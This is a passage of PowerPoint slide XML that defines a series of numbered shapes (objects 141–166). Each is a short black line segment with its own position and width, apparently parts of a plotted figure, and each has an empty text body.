      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="object 141"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2549383" y="5685649"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="4611">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142" name="object 142"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2549382" y="5681630"/>
            <a:ext cx="0" cy="8808"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="4444">
                <a:moveTo>
                  <a:pt x="-2706" y="2167"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2706" y="2167"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="4335">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="object 143"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2577235" y="5683241"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="7041">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="object 144"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2577234" y="5677606"/>
            <a:ext cx="2517" cy="13842"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="6985">
                <a:moveTo>
                  <a:pt x="828" y="6088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="828" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828" y="6088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6364"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="object 145"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2605141" y="5684052"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6213">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="146" name="object 146"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2603499" y="5678400"/>
            <a:ext cx="2517" cy="12583"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="6350">
                <a:moveTo>
                  <a:pt x="0" y="5688"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5688"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828" y="5964"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="147" name="object 147"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632501" y="5684310"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5964">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="object 148"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2632501" y="5678646"/>
            <a:ext cx="1258" cy="12583"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634" h="6350">
                <a:moveTo>
                  <a:pt x="400" y="5563"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="400" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400" y="5563"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5839"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="object 149"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2660354" y="5681097"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9195">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="150" name="object 150"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2657885" y="5670025"/>
            <a:ext cx="2517" cy="21392"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="10794">
                <a:moveTo>
                  <a:pt x="0" y="9914"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244" y="10190"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="151" name="object 151"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2688259" y="5680560"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9747">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="152" name="object 152"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2687960" y="5669519"/>
            <a:ext cx="1258" cy="21392"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634" h="10794">
                <a:moveTo>
                  <a:pt x="0" y="10169"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151" y="10445"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="153" name="object 153"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2716111" y="5677074"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="13254">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="object 154"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2716110" y="5666086"/>
            <a:ext cx="2517" cy="25167"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="12700">
                <a:moveTo>
                  <a:pt x="974" y="11901"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="974" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974" y="11901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="12177"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="object 155"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744019" y="5677879"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12453">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="object 156"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2742632" y="5666882"/>
            <a:ext cx="2517" cy="23909"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="12064">
                <a:moveTo>
                  <a:pt x="0" y="11500"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698" y="11776"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="object 157"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2771925" y="5674924"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="15435">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="158" name="object 158"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2771925" y="5658536"/>
            <a:ext cx="1258" cy="32717"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634" h="16510">
                <a:moveTo>
                  <a:pt x="400" y="15711"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="400" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400" y="15711"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15987"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="object 159"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2799777" y="5673583"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="16788">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="object 160"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2797308" y="5657198"/>
            <a:ext cx="2517" cy="33975"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="17144">
                <a:moveTo>
                  <a:pt x="0" y="16387"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1244" y="16663"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="object 161"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2827682" y="5665284"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25155">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="object 162"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2827383" y="5638137"/>
            <a:ext cx="1258" cy="52851"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634" h="26669">
                <a:moveTo>
                  <a:pt x="0" y="26005"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="26005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151" y="26281"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="object 163"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2855536" y="5668767"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="21648">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="object 164"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2855535" y="5647020"/>
            <a:ext cx="2517" cy="44042"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="22225">
                <a:moveTo>
                  <a:pt x="974" y="21523"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="974" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="974" y="21523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21799"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="object 165"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2883442" y="5668220"/>
            <a:ext cx="1258" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="634">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="276" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="22200">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166" name="object 166"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2882057" y="5646473"/>
            <a:ext cx="2517" cy="44042"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="22225">
                <a:moveTo>
                  <a:pt x="0" y="21799"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="698" y="22075"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
